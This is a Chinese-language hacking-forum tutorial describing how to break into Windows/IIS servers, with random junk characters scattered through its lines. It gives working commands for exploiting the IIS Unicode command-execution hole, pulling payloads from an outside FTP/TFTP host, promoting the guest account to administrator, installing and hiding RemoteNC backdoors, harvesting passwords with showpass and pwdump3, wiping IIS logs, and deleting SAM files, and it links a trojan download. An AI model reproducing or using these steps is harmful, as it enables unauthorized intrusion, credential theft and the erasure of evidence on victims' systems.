【原创】入侵的一些手法

手法, 原创

（这篇教程因为是随意之作没进行过整理，所以很希望各位能够看完，说不定在某个地方就能解决你经常思考的问题了）5 b# C1 f# \4 v. Q. c+ G& y
先用流光(在iv FOR 2000/nt/xp的版本下): z9 E9 E2 ]# L, d: l
一般我都是用SQL扫描(现在的流光都有IIS/PRONTPAGE扫描了，那就用这个）,然后利用的是iis远程执行命令漏洞，这个漏洞你应该知道一般有这个漏洞就有U漏洞，但是有U漏洞不一定有这个漏洞，所以我一般都扫个2-3万台
（网段）比如111.111.1.1-111.111.100.2557 [+ d9 A0 C# Y. B% r3 i$ A5 v
然后就去干别的，运气再不好，也有个好多台。) w5 L0 V% h5 y$ h+ W
然后呢？我的手法是这样的
在IIS远程执行命令漏洞下（这个漏洞流光可以连接，其实就是U漏洞的各种类型，也就说你扫到U漏洞了用我以下写的手法一样非常容易入侵一台机器：），打入$ r$ D' k/ L+ D6 t; x
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe（如果是U漏洞在IE上打入:..../scripts/cmd.exe?/c+ copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe)
其实在IIS远程执行命令漏洞下我们一般能用到的DOS命令（常用的）7 g, c" y4 t3 Y" g
是set查看他的网站结构，dir查看上传情况(记的常用dir c:\xxx/s这个命令）
（此时可以在IE上打入ip/scripts/treasure.exe?/c+set,很有成就感是吗？）) V( a6 K$ V/ V  V! _( R' f0 p
虽然很多时候用SET就能看到网站的WEB目录但是更多的时候还是要用到这个命令
PATH_TRANSLATED=c:\inetpub\wwwroot- u, E' p; {& S) j8 h3 ^
这个就是SET后的结果中的一句话6 t& C6 N% g6 H8 ]6 t
这个就是网站的WEB目录，那如果没这句话呢？没关系用DIR C:\XXX/S这个命令啊
网站上随便找张图点右键，看到图的名字了吧呵呵替换XXX呵呵：）如果C盘下没有？1 I9 j2 Y. B, T6 ]4 }5 ^3 S
呵呵试到F盘：）肯定会有的哈哈1 \2 k( I" L; g
SET还可以查看到很多东东呢：）好好去实验吧，比如SCRIPTS目录，我还碰到过
SCRIPTS目录是c:\progra~1\....\masca什么的呢：）这个你多实验肯定会知道的( L4 s1 ~* Z1 c5 B( y
接着呢我比较喜欢在IE上做事，其实在IIS远程命令执行漏洞上利用是一样的/ z# f% V! ^& f5 H% A
ip/scripts/treasure.exe?/c+" x- T& }. m6 c+ r
这里你该明白了，我们权限很小，一般只能在这里用FTP或者TFTP上传：）
tftp的命令为
ip/scripts/treasure.exe?/c+tftp+ip+get+idq.dll+c:\inetpub\scripts\idq.dll
FTP的命令为
ip/scripts/treasure.exe?/c+echo+open+free.tsee.net>bbs.txt (你的FTP站点，在DOS下用FTP命令你就明白我所写了语句了）

ip/scripts/treasure.exe?/c+echo+treasure>>bbs.txt(ftp用户名)

ip/scripts/treasure.exe?/c+echo+123456>>bbs.txt(ftp密码)
, ]. s* s/ D; T5 T. n3 k! j
ip/scripts/treasure.exe? /c+echo+get+idq.dll>>bbs.txt(idq.dll利用044漏洞入侵的，呵呵直接运行IDQ。DLL亦可以得到个 ADMINISTRATOR用户和密码,iisuser,密码是abcd1234.)/ K2 I( D) ^* u1 l7 D1 l( X8 `
直接运行的命令为ip/scripts/treasure.exe?/c+c:\inetpub\scripts\idq.dll(直接运行其他程序也是一样的用法，聪明的人应该现在就看出来了用的全是DOS命令）/ o. ~2 k" H8 k7 y4 H  f
7 M9 W$ U; C  |2 Z
ip/scripts/treasure.exe?/c+echo+bye>>bbs.txt" b' q5 g( ~% c& s+ N  F

ip/scripts/treasure.exe?/c+ftp+-s:bbs.txt(ftp命令的高级使用了吧呵呵）" v, E5 F" D2 F& e+ v

注意>是完全替换就是说BBS。TXT原来是存在的用>写就用现在的语句替换了，>>是写第二行第三行，
依次类推
  c/ {! O% M4 N# F' X
这里要注意的是bbs.txt最后一定要删除，这里留下了你的FTP站点名字和你的用户名和密码5 ^! s# }( w8 s) c  g: ?; K
如果你下次还想用的话呵呵最好删除了（给个建议用台肉鸡开个FTP自己建立用户名和密码）4 s& k+ h, \! ]3 h1 _9 X0 V
那样最方便了：）用肉鸡做事1 \: [# `/ [% G0 z* R4 i( M  n

然后就好办了
ispc ip/scripts/idq.dll* j* {7 u+ z, @: @( b5 O; X# o
这里要补充的是，既然我们扫的是SQL出来的是IIS漏洞，当然能利用IDQ。DLL了，: E& M+ V- u, C2 G) m& [, r2 T
其实有时候你扫到弱IPC密码和用户，他没开HTTP或者没用IIS那样的话呵呵，IDQ。DLL用不上了9 j  L- M3 s! f1 _8 ?/ K/ M9 _0 N1 N
我们只能上传些木马类的了。0 C$ H  |- I6 _; C3 X

这个是很好的后门，3 a, t3 a4 e0 E$ K. A
别忘记连接后要按三次回车算一次的。% r9 j) v  n' F9 A" P
2 T! O0 y( R- ~
接着一般以我的手法是激活guest
net user guest /active:yes* v% N6 Y  I/ R: e  a4 ~4 a2 A
net user guest 123456
net localgroup administrators guest /add' |% E8 P5 r/ V- T  F3 I9 u( G% T4 {- f
然后呢用ipc连接传个showpass到他的system32目录下呵呵肯定用的上的, ]  k. Y& ], O' T5 t
net use \\ip\ipc$ "800214520" /user:"guest"5 p0 s  p# a+ Q$ v& @" W* z
copy showpass.exe \\ip\admin$\system32\showpass.exe$ g7 A3 T. F1 _/ b* ^
net use \\ip\ipc$ /delete(呵呵习惯要好); F$ W1 @; W# Q& u" V9 h
9 h* l" I# Z! Z1 r# p% q
这里要说明的是有兴趣的朋友也可以上传IRC木马和csrss.exe（简短说明: 本软件可以在Nt4.0/Win2000的系统上面添加Administrators权限账号，由于采用时间添加方式，以任务方式添加账号，在中午12点整时自动添加账号，13点时删除账号，18点时添加账号，19点时删除账号，23点时添加账号，0点删除账号，由于以上几个时间段都是网管最容易忽视的时间，网管根本不会想到你会拥有Administrators权限
账号，从而使得你的劳动结果不会被破坏，

下载地址为：http://www.sandflee.net/down/show.asp?id=62&down=1; w7 H8 U7 ]  ~" W5 B

IRC木马不介绍的原因是太可怕，亦是我认为唯一算的上是好木马+ i) V4 A' Y. N5 m9 _. N  y& @

说到开后门了
其实在上步的时候有兴趣的朋友可以上传ASP后门（但我在这里不推荐，感觉权限还不够大）6 ^8 X/ U+ z- P8 M# W7 g- \. p/ o
4 [& v9 h6 R1 _3 V7 e" t; K
这里我们用的是remotenc' S- W0 ?; L! f' a' x. g
remotenc没有日志记录（爽吗？）呵呵6 t5 @/ `5 D+ Q9 w/ a
remotenc对付administrator密码为空的时候输入""（嘿嘿）" A* q0 q+ |$ t
remotenc的说明这里很详细吧
RemoteNC <IP> <Username> <Password> <Starting Mode>3 G5 k( A. f  z) {/ O" ]) d4 k* Z
<Service Name> <Description Name>8 j6 n* j; B4 `, f, b
<Listen Port> <Control Password> [/OVERWRITE]

remotenc x.x.x.x 用户密码 (LocalSystem or RunAsUser 任选一下) 服务名服务描述监听端口控制密码 [是否覆盖原有服务]  Z( y5 x& ~0 c7 b7 w* H

这里介绍一下我朋友说的隐藏REMOTENC的方法没用过（呵呵不是经验之谈了懒啊没办法)
remotenc 192.***.***.*** Administrator 123456 localsystem Server Server 7 123456(创建remotenc后门)
telnet后门后
dir server.exe
attriv server.exe +h +r0 O6 a, G' L4 |& ]& \
dir server.exe
他在这里用的是DOS命令（很实用啊)
别人不能覆盖你的后门了（因为是只读)) G+ F4 J2 ?# R

当然了有兴趣的可以装个Sniffer+ s- e' Z, z" D" S. K2 p  u

还有的是remotenc的补充说明（可以本地安装）很方便的吧：）! }  {$ P* [1 j1 ^6 M# o! p
可以TELNET后用SHOWPASS（这就是为什么放在system32下的原因了）
SHOWPASS的实用，他本地机器用ADMINISTRATOR登陆后呵呵：）我们SHOWPASS肯定能得到/ |# }% y0 I" i" J% T# \5 X
ADMINISTRATOR的密码
很多时候这个密码在SQL和FTP还有PCANYWHERE里面都是通用的啊+ n2 ^2 k# u, g0 ]0 }9 u7 {0 w+ U7 W
有个软件要注意
dwrcc这里要说明的是这个软件不推荐，但是确实很实用（只要能建立IPC连接就能用这个了，大多数情况）主要这个是图形界面的。但是如果你机器突然之间下面多了个图标或者有时候鼠标移动有些问题，呵呵你会怎么想？

介绍一下我关于使用SHOWPASS的经验；）
你已经会ispc提升权限，idq.dll(也可以当作后门使用),会出现提示符
c:\winnt\system32\>showpass(在这里输入一样ok,前提当然已经用copy showpass.exe \\ip\admin$\system32,传到这个目录了)
用remotenc开了后门以后telnet上去输入showpass(COPY是必须的)1 v  Y, F- ^$ t+ }
成功率相当的高，前提是他那台机器本地用administrator已经登陆，好象WIN2000/NT 把管理员的密码登陆后存放在内存里了还是明文的..2 ], }8 Q' e' h2 q$ [
知道管理员的密码不就又是个后门了，更多的是管理员的密码==pcanywhere的密码=sql的密码% R% F. U- e4 `( Q
showpass的原理(meteor写的我没看懂)
GetWindowText()7 w$ E3 ]0 l; l% k* q* J
and TextOut() window API's; {* ^( d* n+ b. }8 n1 a6 ~5 j5 b

REMOTENC本地安装IP改成127.0.0.19 M0 U( N! l9 s9 ]$ W
还有的是REMOTENC有两种模式可以安装推荐第一种：）90%的机器都能安装成功的（呵呵没装个好的防火墙）, z* X' u% h# N' @
现在的经验是不需要这个也可以IDQ.DLL亦是个好后门不会被杀3 }* p9 G$ o- L/ L# W5 w

还有你REMOTENC装好后就把GUEST 停用吧：）保险点
还有别忘记删除日志（呵呵  这个不是我的习惯，不要跟我学习）0 I9 ~. ^9 P: F4 g( g

cleaniislog.exe . 你的ip //删除所有日至中有你的ip的纪录。
cleaniislog.exe C:\winnt\system32\logfiles\w3svc1\ex020208.log 你的ip //指定删除一个日志文件中你的ip纪录。
p.s: 不一定是w3svc1，有可能是w3svc2 ,vc3等， ex080419 为08年04月19号的日志，即当天日志。# j/ X' Y) c2 q7 q

如果不是~
运行：cleaniislog.exe /? 看看帮助。（这个也不是我写的）# K5 u# _! o( M6 B) D' X
随便看看吧，我的建议是手动改日志
文件目录（看上面的语句）
+ r; ?0 S: ]. y! f3 q$ \  {/ L
关于ispc和IDQ.DLL前面介绍了这里就不说了，反正就这么用(idq.dll可以改成数个名字亦可以使用)9 Y# ?  }9 ?, L4 a3 N

还要推荐个PIPEUPADMIN这个软件很多朋友问我有GUEST用户能上传文件该怎么办，
好简单啊：）用这个软件啊上传后运行就可以了啊：）嘿嘿强制提升权限。1 O  ~. d  y) k$ b3 O/ a
还有啊pwdump3这个软件是抓回SAM挡的：）（有用户名和密码就可以抓回了）LC3破好了
42天内（不管密码多复杂没有破不了的，我讨厌暴力破解我是个没耐心的人）8 S0 Y3 U9 J  Y8 X
) S0 y) A2 I5 M: w
刚想起来了朋友问我怎么看主页很简单啊，用4 m2 x# I& L, R( D
ip/scripts/treasure.exe?/c+type+c:\xxx\xxx.htm
这个是查看文件的目录，你试一下效果好吗？其实一般找到WEB目录的路径我就不信找不到他的主页) @1 I: H9 I( h4 x
7 G. w: w* G% o( t  p2 s$ C
这里要补充的是。其实IIS远程执行命令漏洞就是U漏洞的几个类型从A-F：（我好象也刚领悟）
所以U漏洞也一样利用我写的手法,成功率非常之高。国内很多日10万IP的网站依然有此漏洞。为什么我很多时间不深入探讨PRINTER溢出，PRINTER溢出针对的是没打SP2的：（那没打SP2的肯定有U漏洞了。多思考你会比别人进步的更快。
2 n% i8 ?5 ^8 d; ~% M
这里还要提供一个入侵的新思路如果我用U漏洞或者用FTP能访问他的目录或者其他的方法能访问他的目录并且有删除文件的功能。试试删除了他的winnt/repair和winnt/config下的SAM文件。（2000为SAM，NT为SAM._ ）
: e  E5 j2 S: B
这篇好像是CRACKER入侵啊。呵呵不管了。呵呵写了这么长手酸了，以后再补充点吧。今天就到这里吧